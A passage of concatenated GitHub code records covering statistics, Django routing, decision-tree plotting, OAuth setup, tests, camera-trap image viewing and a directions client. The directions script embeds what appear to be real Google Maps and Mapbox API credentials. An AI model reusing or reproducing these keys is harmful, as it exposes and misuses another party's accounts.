samples['sample'] = samples['sample'].apply(lambda x: np.sort(x))\n samples['trimmed_mean'] = samples['sample'].apply(lambda x:\n np.mean(x[k:-k]))\n samples['mtm'] = (samples['mean'].values -\n samples['trimmed_mean'].values)\n return samples\n\n\ndef boot(npoints, z=None, b=500, k=2):\n \"\"\"\n Parameters\n ----------\n npoints : `list`\n List of N points from which to draw samples.\n z : `int`\n Number of points in each bootstrapped sample.\n b : `int`\n Number of bootstraps to draw.\n k : `int`\n Number of points to trim from each extreme side for\n the trimmed mean.\n \"\"\"\n if z is None:\n z = len(npoints)\n samples = Bootlier(npoints, z, b, k)\n return samples.samples\n\n\nclass Hratio(object):\n\n def __init__(self, mtmlist):\n mtmrange = max(mtmlist) - min(mtmlist)\n x = np.arange(min(mtmlist), max(mtmlist), mtmrange/100.)\n\n try:\n kde_orig = gaussian_kde(mtmlist, bw_method='silverman')\n self.horig = kde_orig.factor\n hrange = np.arange(0.1*self.horig, 10*self.horig, 0.02*self.horig)\n self.horig_kde = kde_orig\n peakind = peakutils.indexes(kde_orig(x), thres=0.02/max(kde_orig(x)))\n self.horig_peak = [(x[peak], kde_orig(x)[peak]) for peak in peakind]\n self.numpeaks = len(peakind)\n\n i = 0\n peaks = 100\n while peaks > 1:\n hcrit = hrange[i]\n kde = gaussian_kde(mtmlist, bw_method=hcrit)\n peakind = peakutils.indexes(kde(x), thres=0.02/max(kde(x)))\n peaks = len(peakind)\n i += 1\n self.hcrit = hrange[i-1]\n kde = gaussian_kde(mtmlist, bw_method=hrange[i-1])\n peakind = peakutils.indexes(kde(x), thres=0.02/max(kde(x)))\n self.hcrit_peak = [(x[peak], kde(x)[peak]) for peak in peakind]\n self.hcrit_kde = kde\n self.hratio = self.horig/hcrit\n self.hratio\n except:\n self.hratio = 100\n self.numpeaks = \"Unknown\"\n\n\ndef find_hratio(mtmlist):\n \"\"\"\n Parameters\n ----------\n mtmlist : `list`\n List of points for making KDEs.\n Returns\n -------\n hratio : Hratio\n The ratio of the original h value to the smallest value of h for\n which the KDE has only one peak and other parameters.\n Less than one contains outliers.\n \"\"\"\n hratio = Hratio(mtmlist)\n return hratio\n\n\ndef find_outliers(origpoints, sensitivity=1., detrend=False):\n \"\"\"Find outliers in a list using a given sensitivity parameter.\n Parameters\n ----------\n npoints : `list`\n List of points for which to find outliers.\n sensitivity : `float`\n Sensitivity threshold for the cutoff hratio.\n Default of 1. Less than 1 is less sensitive to outliers,\n greater than 1 is more sensitive.\n detrend : `boolean`\n If set to True, applies differencing to detrend the list.\n Default is False.\n Returns\n -------\n indices, outliers\n \"\"\"\n\n if detrend is True:\n i1, i2 = itertools.tee(iter(origpoints))\n next(i2)\n lst = [y-x for x, y in zip(i1, i2)]\n lst.insert(0, 0)\n npoints = lst\n points = sorted(npoints)\n else:\n points = sorted(origpoints)\n\n for i in range(0, int(len(points)/2)):\n if i != 0:\n a = points[0:-i]\n if len(a) > 1:\n boota = boot(a)\n ha = find_hratio(boota['mtm'])\n hrat = ha.hratio\n if hrat >= sensitivity:\n remaining = a\n break\n\n b = points[i:]\n if len(b) > 1:\n bootb = boot(b)\n hb = find_hratio(bootb['mtm'])\n hrat = hb.hratio\n if hrat >= sensitivity:\n remaining = b\n break\n\n p = _part(i, 2)\n\n for pair in p:\n a = points[pair[0]:-pair[1]]\n if len(a) > 1:\n boota = boot(a)\n ha = find_hratio(boota['mtm'])\n hrat = ha.hratio\n if hrat >= sensitivity:\n remaining = a\n break\n\n b = points[pair[1]:-pair[0]]\n if len(b) > 1:\n bootb = boot(b)\n hb = find_hratio(bootb['mtm'])\n hrat = hb.hratio\n if hrat >= sensitivity:\n remaining = b\n break\n if hrat >= sensitivity:\n break\n\n if detrend is True:\n outtrend = [x for x in npoints if x not in remaining]\n outindex = [npoints.index(x) for x in outtrend]\n outliers = [origpoints[i] for i in outindex]\n\n return outindex, outliers\n else:\n try:\n outliers = [x for x in origpoints if x not in remaining]\n outindex = [origpoints.tolist().index(x) for x in outliers]\n except AttributeError:\n outliers = [x for x in origpoints if x not in remaining]\n outindex = [origpoints.index(x) for x in outliers]\n\n return outindex, outliers\n","repo_name":"mtpatter/kaiba","sub_path":"kaiba/bootlier.py","file_name":"bootlier.py","file_ext":"py","file_size_in_byte":6667,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"2820186568","text":"from os import name\nfrom django.urls import path\nfrom .views import (QFcompetitions, QFnewCompetition, QFparticipations, QInscriptions, QLCompetitions, Qcompetitions, Qjumps, \n change_result, changeAssign, competitionView, download_file, download_startlist, genSeries, insertParticipation, lanzV2, \n newCompetition, newEvent,newTime, nuevoatleta, otroview, pdfView, probandoGET, resultsView, saltoV2, startView, \n startlistView, verAtleta)\n\n\nurlpatterns = [\n path('cview/',competitionView,name='competition'),\n path('starlist/',startlistView,name='startlistView'),\n path('results/',resultsView,name='results_view'),\n path('new_competition/',newCompetition,name='newCompetition'),\n path('Q_competitions',Qcompetitions,name='Qcompetitions'),\n path('gen_series/',genSeries,name='genSeries'),\n path('s2/',saltoV2,name='saltos2'),\n path('t2/',lanzV2,name='lanz2'),\n path('download_file',download_file,name='download_file'),\n path('download_startlist/',download_startlist,name='download_startlist'),\n path('probando',startView.as_view(),name='probando'),\n path('prueba2',otroview.as_view(),name='prueba2'),\n path('Prueba3/',pdfView,name='prueba3'),\n path('respuesta',probandoGET,name='probandoGet'),\n path('change',change_result,name='changeResult'),\n path('veratle/',verAtleta,name='veratleta'),\n path('nuevoatleta',nuevoatleta,name='nuevoatle'),\n path('Q_jumps/',Qjumps,name='Qjumps'),\n #CHANGES\n path('new_event',newEvent,name='create_event'),\n path('new_participation',insertParticipation,name='change_participation'),\n path('new_time',newTime,name='change_time'),\n path('change_data_assign',changeAssign,name='change_assign'),\n #QUERYS\n path('QL_competitions',QLCompetitions,name='QueryList_competitions'),\n path('QF_competitions',QFcompetitions,name='Query_competitions'),\n path('QF_newCompetition',QFnewCompetition,name='Query_newCompetition'),\n path('QF_participations',QFparticipations,name='Query_participations'),\n path('Q_inscriptions',QInscriptions,name='Query_inscriptions'),\n]","repo_name":"mimoshin/ProyectFDCH","sub_path":"apps/competition/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2247,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"17426722606","text":"from src.setCases.setCases import SetCases\nfrom config.config import graph_array, graph_array_ratio\n\nclass Node:\n def __init__(self, data: SetCases, id_node: int , val_attr = None):\n \"\"\"Initializes a node with a set of data, an identifier and a value of attribute\n\n Args:\n data (SetCases): set of data object to be used in the node\n id_node (int): node identifier\n val_attr (str, optional): When node is leaf, it will contain the value of the chosen attribute. Defaults to None.\n \"\"\" \n # asign initial values for class attributes\n self.data = data\n self.children = []\n self.curr_class = ''\n self.chosen_att = ''\n self.id_node = id_node\n self.val_attr = val_attr\n self.gain = 0\n self.childrenNodeColor = 'green'\n\n def addChildren(self, node):\n \"\"\"Adds a child to the node\n Args:\n node ([Node]): [Node to be added]\n \"\"\"\n self.children.append(node)\n \n def printTree(self, depth: int, graph, previous_node, name_previous_node: int, algorithm: str):\n \"\"\"Prints the tree generated with graphviz\n\n Args:\n depth (int): intial depth of the tree, increases by each level\n graph ([Digraph]): graphviz Digraph object\n previous_node ([Node]): node from previous level where the current instance of the function was called\n name_previous_node (int): previous node identifier\n algorithm (str): chosen algorithm to print the tree (gain or gain ratio)\n \"\"\"\n # If the chosen attribute for the current iteration is not an empty string, it creates a node with the chosen attribute for the class, and shows the gain of the node (gain or gain ratio)\n if self.chosen_att != '':\n graph.node(name = str(self.id_node),label = f'Clase: {self.chosen_att} \\n Gain: {round(self.gain,3)}')\n else:\n #If the leaf node has more than one value of the class (inpure), it sets the node color to orange\n if len(self.data.cases[self.data.class_column_name].value_counts())>1: \n self.childrenNodeColor = 'orange'\n else:\n #If the leaf node has only one value of the class (pure), it sets the node color to green\n self.childrenNodeColor = 'green'\n #We create the leaf node with the previous assigned color, and show the gain and amount of cases for each class attribute the node has\n label = f'Clase: {self.curr_class} \\n Gain: {round(self.gain,3)} \\n [{self.data.cases[self.data.class_column_name].value_counts().to_string()}] \\n { str(round(((list(self.data.cases[self.data.class_column_name].value_counts())[0]) / sum(self.data.cases[self.data.class_column_name].value_counts()))*100,2)) }%'\n \n graph.node(name = str(self.id_node), label= label,color=self.childrenNodeColor,style='filled')\n # We create the edge between the current node and the previous node\n if depth != 0:\n graph.edge(str(name_previous_node), str(self.id_node),label=str(self.val_attr),splines='line')\n name_previous_node+=1\n\n for item in self.children:\n # We append the current generated graph to the graph array, so as to keep each step made in the tree\n if algorithm == 'gain':\n graph_array.append(graph.copy())\n else:\n graph_array_ratio.append(graph.copy())\n item.printTree(depth+1, graph, self, self.id_node, algorithm)\n \n def printTreeWithoutDetails(self, depth: int, graph, previous_node, name_previous_node: int, algorithm: str):\n \"\"\"Prints the tree generated with graphviz with only name and purity\n\n Args:\n depth (int): intial depth of the tree, increases by each level\n graph ([Digraph]): graphviz Digraph object\n previous_node ([Node]): node from previous level where the current instance of the function was called\n name_previous_node (int): previous node identifier\n algorithm (str): chosen algorithm to print the tree (gain or gain ratio)\"\"\"\n if self.chosen_att != '':\n # decision node printing\n graph.node(name = str(self.id_node),label = f'Clase: {self.chosen_att}')\n else:\n if len(self.data.cases[self.data.class_column_name].value_counts())>1:\n # inpure leaf node\n self.childrenNodeColor = 'orange'\n else:\n # pure leaf node\n self.childrenNodeColor = 'green'\n \n label = f'Clase: {self.curr_class} \\n { str(round(((list(self.data.cases[self.data.class_column_name].value_counts())[0]) / sum(self.data.cases[self.data.class_column_name].value_counts()))*100,2)) }%'\n graph.node(name = str(self.id_node), label=label,color=self.childrenNodeColor,style='filled')\n if depth != 0:\n # none root edge creation, joins parent with current, as root has no parent, it is only called for non root nodes\n graph.edge(str(name_previous_node), str(self.id_node),label=str(self.val_attr),splines='line')\n name_previous_node+=1\n for item in self.children:\n # We append the current generated graph to the graph array, so as to keep each step made in the tree\n if algorithm == 'gain':\n graph_array.append(graph.copy())\n else:\n graph_array_ratio.append(graph.copy())\n # recursive call\n item.printTreeWithoutDetails(depth+1, graph, self, self.id_node, algorithm)\n ","repo_name":"AlejandroFNadal/ia_decision_trees","sub_path":"src/node/Node.py","file_name":"Node.py","file_ext":"py","file_size_in_byte":5676,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"71558739361","text":"import os\nimport pickle\nfrom google_auth_oauthlib.flow import InstalledAppFlow\nfrom google.auth.transport.requests import Request\n\n# Se modificar o escopo, exclua o arquivo token.pickle.\nSCOPES = ['https://www.googleapis.com/auth/gmail.send']\n\ndef get_credentials():\n creds = None\n # O arquivo token.pickle armazena as credenciais do usuário.\n # Ele é criado automaticamente ao executar pela primeira vez.\n if os.path.exists('token.pickle'):\n with open('token.pickle', 'rb') as token:\n creds = pickle.load(token)\n # Se não houver credenciais válidas, deixe o usuário fazer login.\n if not creds or not creds.valid:\n if creds and creds.expired and creds.refresh_token:\n creds.refresh(Request())\n else:\n flow = InstalledAppFlow.from_client_secrets_file(\n 'credentials.json', SCOPES)\n creds = flow.run_local_server(port=0)\n # Salve as credenciais para a próxima execução\n with open('token.pickle', 'wb') as token:\n pickle.dump(creds, token)\n return creds\n\nif __name__ == \"__main__\":\n get_credentials()\n","repo_name":"ArthurMS15/arthurms15.github.io","sub_path":"segurancasenha/teste/generate_token.py","file_name":"generate_token.py","file_ext":"py","file_size_in_byte":1135,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"41865835164","text":"import torch as th\nimport numpy as np\nimport os\nimport random\n\nrng = {'np_rng': None, 'th_rng': None}\ndef init_rng(seed: int) -> None:\n random.seed(seed)\n\n rng['np_rng'] = np.random.default_rng(seed)\n rng['th_rng'] = th.Generator()\n rng['th_rng'].manual_seed(0)\n\n os.environ[\"CUBLAS_WORKSPACE_CONFIG\"] = ':16:8'\n th.random.manual_seed(seed)\n th.backends.cudnn.benchmark = False\n th.use_deterministic_algorithms(True)\n\ndef seed_worker(worker_id):\n worker_seed = th.initial_seed() % 2**32\n np.random.seed(worker_seed)\n random.seed(worker_seed)","repo_name":"nsoul97/Real-Time-Object-Size-Prediction","sub_path":"real_time_object_prediction/reproducibility.py","file_name":"reproducibility.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"12892289071","text":"import source.utilities.config.config_builder as config_builder\nimport unittest\n\nfrom source.policy.parameters import AtariSize\nfrom source.utilities.config.hyperparameters import HyperParameters\nfrom unittest.mock import patch\n\n\nclass FullTest(unittest.TestCase):\n @patch('socket.gethostname')\n def test_get_hyperparameters(self, socket_wd):\n socket_wd.return_value = 'cosy04'\n hyperparameters = config_builder.get_hyperparameters()\n self.assertEqual(17, hyperparameters.ppo_epochs)\n self.assertEqual(1, hyperparameters.nn_learn_rate)\n self.assertEqual('TestNoFrameskip-v4', hyperparameters.env_name)\n\n\nclass GetGroupTest(unittest.TestCase):\n @patch('socket.gethostname')\n def test_all_groups(self, hostname_wd):\n expected = {0: [1, 2, 3],\n 1: [4, 5, 6],\n 2: [7, 8, 9],\n 3: [10, 11, 12],\n 4: [13, 14, 15]}\n for i in range(15):\n name = 'cosy0' + str(i + 1)\n hostname_wd.return_value = name\n group = config_builder.get_group()\n self.assertTrue((i + 1) in expected[group])\n\n def test_host_name_not_cosy(self):\n group = config_builder.get_group()\n self.assertEqual(0, group)\n\n\nclass UpdateParametersTest(unittest.TestCase):\n def test_atari_size_exception(self):\n config = {'nn_size': 'LARGE'}\n hyperparameters = HyperParameters('')\n config_builder._update_parameters(hyperparameters, config)\n self.assertEqual(AtariSize.LARGE, hyperparameters.nn_size)\n\n\nclass GetHyperparametersTest(unittest.TestCase):\n config = {'env_name': 'SpaceInvaders-v4',\n 'nn_learn_rate': '0.05'}\n\n @patch('source.utilities.config.config_builder.open_config')\n def test_config_structure(self, config_wd):\n config_wd.return_value = self.config\n config = config_builder.get_hyperparameters()\n self.assertEqual('SpaceInvadersNoFrameskip-v4', config.env_name)\n self.assertEqual(0.05, config.nn_learn_rate)\n self.assertEqual(3, config.ppo_epochs)\n\n\nclass InitTest(unittest.TestCase):\n def test_init_incomplete_name(self):\n result = config_builder._init_hyperparameters('Test-v4')\n self.assertEqual('TestNoFrameskip-v4', result.env_name)\n\n def test_init_complete_name(self):\n result = config_builder._init_hyperparameters('TestNoFrameskip-v1')\n self.assertEqual('TestNoFrameskip-v1', result.env_name)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"Aethiles/ppo-pytorch","sub_path":"test/utilities/test_config_builder.py","file_name":"test_config_builder.py","file_ext":"py","file_size_in_byte":2536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"14281991434","text":"import http.client, urllib.parse\nimport json\n\n\ndef http_call(method, connection, path, dictionary={}):\n\t\n connection.request( method, path +'?'+ urllib.parse.urlencode(dictionary))\n resp = connection.getresponse()\n status=resp.status\n body_bytes = resp.read()\n body = body_bytes.decode( resp.headers.get_content_charset( 'utf-8' ) )\n return ( status, body )\n\n\nurl = 'maps.googleapis.com'\t\nconnection = http.client.HTTPSConnection(url)\n\nurl2='api.mapbox.com'\nconnection2=http.client.HTTPSConnection(url2)\n\t\n\ndef geoCode(location, typ):\n\t(status, body ) = http_call( \"GET\", connection, \"/maps/api/geocode/json\",{ \"key\":\"AIzaSyCMJmsvDWtXjXaxdsv7FteoCDLUdzHqXXk\", \"address\":location})\n\tdata=json.loads(body)\n\t#if there are multiple locations\n\tif len(data[\"results\"])>1 and typ==\"coords\":\n\t\tprint (\"There is more than one location with that address\")\n\t\tfor i in range (len(data[\"results\"])):\n\t\t\taddress=str(i)+\" \"+data[\"results\"][i][\"formatted_address\"]\n\t\t\tprint (address)\n\t\tprint (\"Enter the list number you would like to use\")\n\t\tindex=input(\">>\")\n\t\tlocation=data[\"results\"][int(index)]\n\n\t\tif typ==\"coords\":\n\t\t\tlat=data[\"results\"][int(index)][\"geometry\"][\"location\"][\"lat\"]\n\t\t\tlon=data[\"results\"][int(index)][\"geometry\"][\"location\"][\"lng\"]\n\t\t\treturn (lat, lon)\n\n\t\telif typ==\"address\":\t\n\t\t\taddress=data[\"results\"][int(index)][\"formatted_address\"]\n\t\t\treturn (address)\n\telif data[\"status\"]==\"OK\":\n\t\tif typ==\"coords\":\n\t\t\tlat=data[\"results\"][0][\"geometry\"][\"location\"][\"lat\"]\n\t\t\tlon=data[\"results\"][0][\"geometry\"][\"location\"][\"lng\"]\n\t\t\treturn (lat, lon)\n\n\t\telse:\n\t\t\taddress=data[\"results\"][0][\"formatted_address\"]\n\t\t\treturn (address)\n\telse:\n\t\tprint (\"Sorry, we could not find that location\")\n\t\treturn (None)\n\n\n\ndef getDirections(origin, destination):\n\tgoogInstructions=\"\"\n\totherInstructions=\"\"\n\t( status, body ) = http_call( \"GET\", connection, \"/maps/api/directions/json\",{ \"key\":\"AIzaSyCMJmsvDWtXjXaxdsv7FteoCDLUdzHqXXk\", \"origin\":origin, \"destination\":destination})\n\tdata=json.loads(body)\n\tdriveTime=data[\"routes\"][0][\"legs\"][0][\"duration\"][\"text\"]\n\t\n\n\t( status, body ) = http_call( \"GET\", connection, \"/maps/api/directions/json\",{ \"key\":\"AIzaSyCMJmsvDWtXjXaxdsv7FteoCDLUdzHqXXk\", \"origin\":origin, \"mode\":\"bicycling\",\"destination\":destination})\n\tdata=json.loads(body)\n\tbikeTime=data[\"routes\"][0][\"legs\"][0][\"duration\"][\"text\"]\n\t#gets directions\n\t#for i in range (len(data[\"routes\"][0][\"legs\"][0][\"steps\"])-1):\n\t#\tgoogInstructions+=\" \"+data[\"routes\"][0][\"legs\"][0][\"steps\"][i][\"html_instructions\"]\n\t#googInstructions=googInstructions.replace('', '')\n\t#googInstructions=googInstructions.replace('', '')\n\t#print (\"Google Bike Directions : \"+googInstructions)\n\n\to=origin.split(',')\n\tswitchedOrigin=o[1]+','+o[0]\n\td=destination.split(',')\n\tswitchedDestination=d[1]+','+d[0]\n\n\t( status, body ) = http_call( \"GET\", connection2, \"/v4/directions/mapbox.cycling/\"+switchedOrigin+\";\"+switchedDestination+\".json\", {\"access_token\":\"pk.eyJ1IjoiY2xhdWRpYWZpbm4iLCJhIjoiY2llbHJpMG4xMDBlZHNzbTRud2FubGJtcyJ9.UJaO_S1zju89aeXPex7c9g\"})\n\tdata=json.loads(body)\n\tcompTime = (data[\"routes\"][0][\"duration\"])/60\n\t\n\t#gets directions\n\t#for i in range (len(data[\"routes\"][0][\"steps\"])):\n\t#\totherInstructions+=\" \"+data[\"routes\"][0][\"steps\"][i][\"maneuver\"][\"instruction\"]\n\t#print(\"Comparison directions\"+str(otherInstructions))\n\treturn (driveTime, bikeTime, compTime)\n\n\n\n\n","repo_name":"claudiafinn/Event-Web-Service","sub_path":"GoogleDirections.py","file_name":"GoogleDirections.py","file_ext":"py","file_size_in_byte":3360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"15500120400","text":"import goodboy as gb\nimport pytest\nimport sqlalchemy as sa\n\nfrom goodboy_sqlalchemy.column import Column, ColumnBuilder, ColumnBuilderError\nfrom goodboy_sqlalchemy.column_schemas import column_schema_builder\n\nBase = sa.orm.declarative_base()\n\n\nclass Dummy(Base):\n __tablename__ = \"dummies\"\n\n id = sa.Column(sa.Integer, primary_key=True)\n\n field_1 = sa.Column(sa.String, nullable=False, unique=True)\n field_2 = sa.Column(sa.String)\n field_3 = sa.Column(sa.String, default=\"val\")\n field_4 = sa.Column(sa.String, server_default=\"val\")\n field_5 = sa.Column(\"field_5_in_database\", sa.String)\n\n\n@pytest.fixture\ndef column_builder():\n return ColumnBuilder(column_schema_builder)\n\n\ndef test_builds_simple_columns(column_builder: ColumnBuilder):\n assert column_builder.build(Dummy, [\"field_1\", \"field_2\"]) == [\n Column(\"field_1\", gb.Str(), required=True, unique=True),\n Column(\"field_2\", gb.Str(allow_none=True), required=False, unique=False),\n ]\n\n\ndef test_builds_renamed_columns(column_builder: ColumnBuilder):\n print(column_builder.build(Dummy, [\"field_5\"])[0])\n print(column_builder.build(Dummy, [\"field_5\"])[0].__dict__)\n assert column_builder.build(Dummy, [\"field_5\"]) == [\n Column(\"field_5\", gb.Str(allow_none=True), required=False, unique=False),\n ]\n\n\ndef test_handles_default_value(column_builder: ColumnBuilder):\n column = Column(\n \"field_3\",\n gb.Str(allow_none=True),\n required=False,\n unique=False,\n default=\"val\",\n )\n\n assert column_builder.build(Dummy, [\"field_3\"]) == [column]\n\n\ndef test_handles_server_default_value(column_builder: ColumnBuilder):\n column = Column(\n \"field_4\",\n gb.Str(allow_none=True),\n required=False,\n unique=False,\n has_default=True,\n )\n\n assert column_builder.build(Dummy, [\"field_4\"]) == [column]\n\n\ndef test_raises_error_when_column_not_found(column_builder: ColumnBuilder):\n with pytest.raises(ColumnBuilderError):\n column_builder.build(Dummy, [\"unknown_field\"])\n","repo_name":"andryunin/goodboy-sqlalchemy","sub_path":"tests/column/test_column_builder.py","file_name":"test_column_builder.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"18011399361","text":"##################################################\n# Purpose: View camera trap image data #\n# Author: Amy Andrews #\n# Resources used:\n# Pytorch documentation https://pytorch.org/tutorials/beginner/blitz/cifar10_tutorial.html\n##################################################\n#%%\nimport matplotlib.image as mpimg\nimport numpy as np\nimport pandas as pd\nfrom matplotlib import pyplot as plt\nimport torchvision\nimport seaborn as sns\nimport json\n\nfrom utils import *\nfrom load_data import load_data\nfrom set_args import get_args\nfrom torch.utils.data import DataLoader\n\nimport config\n\nargs = get_args()\n\n#%%\n# look at meta-data\nda = pd.read_csv(args['metadata'])\nda['im_id'] = np.arange(da.shape[0])\nalct_splits = pd.read_csv('splits/kenya_splits.csv')\nda = da.join(alct_splits.set_index('Unnamed: 0'), on='Unnamed: 0')\ncounting(np.asarray(da['daytime']))\n\nwith open(animal_dicts, 'rb') as handle:\n animals_dict = json.load(handle)\nda['animal_name'] = da['category_id'].apply(lambda x: animals_dict[x]).to_numpy()\nsns.countplot(y = \"animal_name\",\n data = da,\n hue=\"img_set2\",\n order = da[\"animal_name\"].value_counts().index)\nplt.tight_layout()\nplt.show()\n\n# counts for the subset groups\nsubset1 = da[da['10_perc_split_train'] == 0]\nfor i in range(10):\n print(len(da[da['10_perc_split_train'] == i]))\n\ntrainOnly = da[da['img_set2']=='train']\ncounting(np.asarray(subset1['category_id']))\ncountsDa = da[da['img_set2']=='train'].groupby(['10_perc_split_train', 'category_id']).agg(['count'])\n\n\n#%%\n# look at some train set data\nif args['train_loss'] == 'supervised':\n train_set, val_set, test_set = load_data(args)\n train = DataLoader(train_set, batch_size=15, shuffle=False, num_workers=args['num_workers'])\n dataiter = iter(train)\n images = dataiter.next()\n vis_ims(images['img1_path'], images['target'], images['target'], args, nrow=5)\n\n\n# examine images when fixmatch is set as loss\nif args['train_loss'] == 'fixmatch':\n supervised_set, unsupervised_set, val_set, test_set= load_data(args)\n unsupervised = DataLoader(unsupervised_set, batch_size=9, shuffle=False, num_workers=args['num_workers'])\n val = DataLoader(val_set, batch_size=9, shuffle=False, num_workers=args['num_workers'])\n dataiter = iter(unsupervised)\n images = dataiter.next()\n\n vis_ims(images['img1_path'], images['target'], images['target'], args, nrow=3)\n vis_ims(images['weak_augmentation'], images['target'], images['target'], args, nrow=3)\n vis_ims(images['strong_augmentation'], images['target'], images['target'], args, nrow=3)\n\n #### view CIFAR data\n\n import matplotlib.pyplot as plt\n import numpy as np\n\n classes = ('plane', 'car', 'bird', 'cat',\n 'deer', 'dog', 'frog', 'horse', 'ship', 'truck')\n\n dataiter = iter(unsupervised)\n imdata = dataiter.next()\n weakims = imdata['weak_augmentation']\n strongims = imdata['strong_augmentation']\n labels = imdata['target']\n imshow_mod(torchvision.utils.make_grid(weakims, nrow=3))\n imshow_mod(torchvision.utils.make_grid(strongims, nrow=3))\n print(' '.join('%5s' % classes[labels[j]] for j in range(9)))\n\n dataiterval = iter(val)\n imdataval = dataiterval.next()\n valims = imdataval['im']\n labelsval = imdataval['target']\n imshow_mod(torchvision.utils.make_grid(valims, nrow=3))\n print(' '.join('%5s' % classes[labelsval[j]] for j in range(9)))\n\n\n# examine images in splits\nargs = get_args()\n\nfrom load_data import im_transforms, images_data\nfrom torch.utils.data import Subset\nweak_transform, strong_transform, test_transform = im_transforms(args)\ntrain_set = images_data(args, ['train'], test_transform)\n\nsplitsDict = {}\nfor i in [1,2,3,4,5]:\n filepath = 'splits/kenya320unequalLabels' + str(i) + '.pkl'\n with open(filepath, 'rb') as handle:\n loaded = pickle.load(handle)\n splitsDict[(i - 1)] = np.asarray(loaded)\n\ntrain_set = Subset(train_set, splitsDict[0])\n#train_set = images_data(args, split=['train'], transform=train_transform, return_single_image=True, indices=labeled_idx)\ntrain = DataLoader(train_set, batch_size=80, shuffle=False, num_workers=args['num_workers'])\ndataiter = iter(train)\nimages = dataiter.next()\nvis_ims(images['img1_path'], images['target'], images['target'], args, nrow=10)\n\n\n\n\n#############################\n# create plot of zebras\n# within-category variation\n#############################\n\nimcheck = mpimg.imread('warthog.jpg')\nimcheck2 = mpimg.imread('zebra.jpg')\nplt.imshow(imcheck2); plt.show()\n\nimg1 = mpimg.imread('zebra.jpg')\nimg2 = mpimg.imread('zebra.jpg')\nimg3 = mpimg.imread('zebra.jpg')\nimg4 = mpimg.imread('zebra.jpg')\n\nim1caption = 'Width = {}, Height = {}'.format(img1.shape[1], img1.shape[0])\nim2caption = 'Width = {}, Height = {}'.format(img2.shape[1], img2.shape[0])\nim3caption = 'Width = {}, Height = {}'.format(img3.shape[1], img3.shape[0])\nim4caption = 'Width = {}, Height = {}'.format(img4.shape[1], img4.shape[0])\n\nplt.rcParams[\"font.family\"] = \"serif\"\nplt.figure(figsize=(8, 6))\nf, axarr = plt.subplots(2, 2)\naxarr[0,0].imshow(img1)\naxarr[0,0].set_title(\"Ideal\")\naxarr[0,0].axes.yaxis.set_ticks([])\naxarr[0,0].axes.xaxis.set_ticks([])\naxarr[0,0].set_xlabel(im1caption)\n\naxarr[0,1].imshow(img2)\naxarr[0,1].set_title(\"Poor illumination\")\naxarr[0,1].axes.yaxis.set_ticks([])\naxarr[0,1].axes.xaxis.set_ticks([])\naxarr[0,1].set_xlabel(im2caption)\n\naxarr[1,0].imshow(img3)\naxarr[1,0].set_title(\"Perspective change\")\naxarr[1,0].axes.yaxis.set_ticks([])\naxarr[1,0].axes.xaxis.set_ticks([])\naxarr[1,0].set_xlabel(im3caption)\n\naxarr[1,1].imshow(img4)\naxarr[1,1].set_title(\"Occlusion\")\naxarr[1,1].axes.yaxis.set_ticks([])\naxarr[1,1].axes.xaxis.set_ticks([])\naxarr[1,1].set_xlabel(im4caption)\n\nfilepathname ='variationZebra'\nplt.tight_layout(pad=2.0)\nplt.savefig(\"figs/\" + filepathname + '.png', format='png', dpi=300)\nplt.savefig(\"figs/\" + filepathname + '.pdf', format='pdf', dpi=300)\nplt.show()\n\n\n##########################\n# topi vs eland\n##########################\n\nimg1 = mpimg.imread('eland.jpg')\nimg2 = mpimg.imread('topi.jpg')\nimg3 = mpimg.imread('thomsons.jpg')\nimg4 = mpimg.imread('grants.jpg')\nplt.rcParams[\"font.family\"] = \"serif\"\nplt.figure(figsize=(8, 6))\nf, axarr = plt.subplots(2, 2)\naxarr[0,0].imshow(img1)\naxarr[0,0].set_title(\"Eland\")\naxarr[0,0].axes.yaxis.set_ticks([])\naxarr[0,0].axes.xaxis.set_ticks([])\n\naxarr[0,1].imshow(img2)\naxarr[0,1].set_title(\"Topi\")\naxarr[0,1].axes.yaxis.set_ticks([])\naxarr[0,1].axes.xaxis.set_ticks([])\n\naxarr[1,0].imshow(img3)\naxarr[1,0].set_title(\"Thomson's Gazelle\")\naxarr[1,0].axes.yaxis.set_ticks([])\naxarr[1,0].axes.xaxis.set_ticks([])\n\naxarr[1,1].imshow(img4)\naxarr[1,1].set_title(\"Grant's Gazelle\")\naxarr[1,1].axes.yaxis.set_ticks([])\naxarr[1,1].axes.xaxis.set_ticks([])\n\nfilepathname ='topiElandGazelle'\nplt.tight_layout(pad=1.5)\nplt.savefig(\"figs/\" + filepathname + '.png', format='png', dpi=300)\nplt.savefig(\"figs/\" + filepathname + '.pdf', format='pdf', dpi=300)\nplt.show()\n\n##########################\n# image stats plot\n##########################\n\nplt.scatter(da['width'][da['img_set2']=='train'], da['height'][da['img_set2']=='train'])\nplt.scatter(da['width'][da['img_set2']=='test'], da['height'][da['img_set2']=='test'])\nplt.show()\n\n","repo_name":"myndrws/ssal_ct","sub_path":"view_data.py","file_name":"view_data.py","file_ext":"py","file_size_in_byte":7263,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"38944309551","text":"import datetime\nimport logging.config\nimport os\nfrom uuid import uuid4\n\nimport config\nimport services\n\nlogging.config.dictConfig(config.LOGGING_CONFIG)\nlogger = logging.getLogger('voicekit_logger')\n\n\ndef main():\n # Считываем аргументы командной строки\n args = services.create_parser()\n # Пропускаем .wav файл через распознавание голоса\n response = services.voice_recognition(args.filepath)\n transcript = response[0][\"alternatives\"][0][\"transcript\"]\n duration = services.calc_duration(response)\n # Ищем результат\n result = False\n if args.recognition_stage == \"stage_one\":\n result = services.stage_one(transcript)\n elif 